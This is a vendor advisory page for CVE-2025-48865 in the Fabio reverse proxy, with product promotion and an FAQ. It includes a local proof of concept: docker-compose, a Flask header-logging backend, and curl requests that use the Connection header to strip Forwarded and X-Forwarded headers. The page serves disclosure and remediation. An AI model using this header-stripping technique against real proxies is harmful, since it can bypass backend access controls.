CVE-2025-48865

CVE-2025-48865 is a critical-severity security vulnerability in github.com/fabiolb/fabio (go), affecting versions <= 1.6.5. It is fixed in 1.6.6.

Summary

Fabio allows clients to remove X-Forwarded headers (except X-Forwarded-For) due to a vulnerability in how it processes hop-by-hop headers.

Fabio adds HTTP headers like X-Forwarded-Host and X-Forwarded-Port when routing requests to backend applications. Since the receiving application should trust these headers, allowing HTTP clients to remove or modify them creates potential security vulnerabilities.

However, it was found that some of these custom headers can indeed be removed and, in certain cases, manipulated. The attack relies on the behavior that headers can be defined as hop-by-hop via the HTTP Connection header. By setting the following connection header, the X-Forwarded-Host header can, for example, be removed:

Connection: close, X-Forwarded-Host

Similar critical vulnerabilities have been identified in other web servers and proxies, including CVE-2022-31813 in Apache HTTP Server and CVE-2024-45410 in Traefik.

Details

It was found that the following headers can be removed in this way (i.e. by specifying them within a connection header):

  • X-Forwarded-Host
  • X-Forwarded-Port
  • X-Forwarded-Proto
  • X-Real-Ip
  • Forwarded

PoC

The following docker-compose file was used for testing:

version: '3'
services:
  fabio:
    image: fabiolb/fabio
    ports:
      - "3000:9999"
      - "9998:9998"
    volumes:
      - ./fabio.properties:/etc/fabio/fabio.properties

  backend:
    build: .
    ports:
      - "8080:8080"
    environment:
      - PYTHONUNBUFFERED=1

The fabio.properties configuration:

proxy.addr = :9999
ui.addr = :9998
registry.backend = static
registry.static.routes = route add service / http://backend:8080/

A Python container runs a simple HTTP server that logs received headers.
The Dockerfile:

FROM python:3.11-slim

WORKDIR /app

COPY app.py .

RUN pip install flask

EXPOSE 8080

CMD ["python", "app.py"]

Python Flask Server

from flask import Flask, request
import sys
import os

sys.stdout.flush()
sys.stderr.flush()
os.environ['PYTHONUNBUFFERED'] = '1'

app = Flask(__name__)

@app.before_request
def log_request_info():
    print("HEADERS:")
    for header_name, header_value in request.headers:
        print(f"   {header_name}: {header_value}")

@app.route("/", methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH'])
def hello():
    return f"Hello, World! Method: {request.method}"

@app.route("/<path:path>", methods=['GET', 'POST', 'PUT', 'DELETE', 'PATCH'])
def catch_all(path):
    return f"Caught path: {path}, Method: {request.method}"

if __name__ == "__main__":
    app.run(host="0.0.0.0", port=8080, debug=True)

A normal HTTP request/response pair looks like this:

Request

GET / HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: curl/8.7.1
Accept: */*
Connection: keep-alive

curl command

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: 127.0.0.1:3000' -H $'User-Agent: curl/8.7.1' -H $'Accept: */*' -H $'Connection: keep-alive' \
    $'http://127.0.0.1:3000/'

Response

HTTP/1.1 200 OK
Server: Werkzeug/3.1.3 Python/3.11.12
Date: Thu, 22 May 2025 23:09:12 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 25
Connection: close

Hello, World! Method: GET

Server Log

backend-1  | HEADERS:
backend-1  |    Host: 127.0.0.1:3000
backend-1  |    User-Agent: curl/8.7.1
backend-1  |    Accept: */*
backend-1  |    Forwarded: for=192.168.65.1; proto=http; by=172.24.0.3; httpproto=http/1.1
backend-1  |    X-Forwarded-For: 192.168.65.1
backend-1  |    X-Forwarded-Host: 127.0.0.1:3000
backend-1  |    X-Forwarded-Port: 3000
backend-1  |    X-Forwarded-Proto: http
backend-1  |    X-Real-Ip: 192.168.65.1

Next, a request, where the Forwarded header is defined as a hop-by-hop header via the Connection header is sent:

Request

GET / HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: curl/8.7.1
Accept: */*
yeet: 123
Connection: keep-alive, Forwarded

curl command

curl --path-as-is -i -s -k -X $'GET' \
    -H $'Host: 127.0.0.1:3000' -H $'User-Agent: curl/8.7.1' -H $'Accept: */*' -H $'Connection: keep-alive, Forwarded' \
    $'http://127.0.0.1:3000/'

Response

HTTP/1.1 200 OK
Content-Length: 25
Content-Type: text/html; charset=utf-8
Date: Thu, 22 May 2025 23:42:45 GMT
Server: Werkzeug/3.1.3 Python/3.11.12

Hello, World! Method: GET

Server Logs

backend-1  | HEADERS:
backend-1  |    Host: 127.0.0.1:3000
backend-1  |    User-Agent: curl/8.7.1
backend-1  |    Accept: */*
backend-1  |    X-Forwarded-For: 192.168.65.1
backend-1  |    X-Forwarded-Host: 127.0.0.1:3000
backend-1  |    X-Forwarded-Port: 3000
backend-1  |    X-Forwarded-Proto: http
backend-1  |    X-Real-Ip: 192.168.65.1

The response shows that Fabio's Forwarded header was removed from the request

References

Impact

If the backend application trusts these custom headers for security-sensitive operations, their removal or modification may lead to vulnerabilities such as access control bypass.

This vulnerability has a critical severity rating similar to CVE-2022-31813 (Apache HTTP Server, 9.8) and CVE-2024-45410 (Traefik, 9.3)

Stripping headers like X-Real-IP can confuse the upstream server about whether the request is coming from an external client through the reverse proxy or from an internal source. This type of vulnerability can be exploited as demonstrated in: Versa Concerto RCE.

CVE-2025-48865 has a CVSS score of 9.1 (Critical). The vector is network-reachable, no privileges required, and no user interaction. A CVSS score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether this affects your application depends on whether the vulnerable code is present and reachable in your environment. A fixed version is available (1.6.6); upgrading removes the vulnerable code path.

Affected versions

github.com/fabiolb/fabio (<= 1.6.5)

Security releases

github.com/fabiolb/fabio → 1.6.6 (go)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade github.com/fabiolb/fabio to 1.6.6 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2025-48865? CVE-2025-48865 is a critical-severity security vulnerability in github.com/fabiolb/fabio (go), affecting versions <= 1.6.5. It is fixed in 1.6.6.
  2. How severe is CVE-2025-48865? CVE-2025-48865 has a CVSS score of 9.1 (Critical). This score reflects the worst-case severity of the vulnerability, not your specific exposure. Whether it represents real risk in your environment depends on whether the vulnerable code is present and reachable.
  3. Which versions of github.com/fabiolb/fabio are affected by CVE-2025-48865? github.com/fabiolb/fabio (go) versions <= 1.6.5 is affected.
  4. Is there a fix for CVE-2025-48865? Yes. CVE-2025-48865 is fixed in 1.6.6. Upgrade to this version or later.
  5. Is CVE-2025-48865 exploitable, and should I be worried? Whether CVE-2025-48865 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  6. What actually determines whether CVE-2025-48865 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  7. How do I fix CVE-2025-48865? Upgrade github.com/fabiolb/fabio to 1.6.6 or later.

Other vulnerabilities in github.com/fabiolb/fabio

Stop the waste.
Protect your environment with Kodem.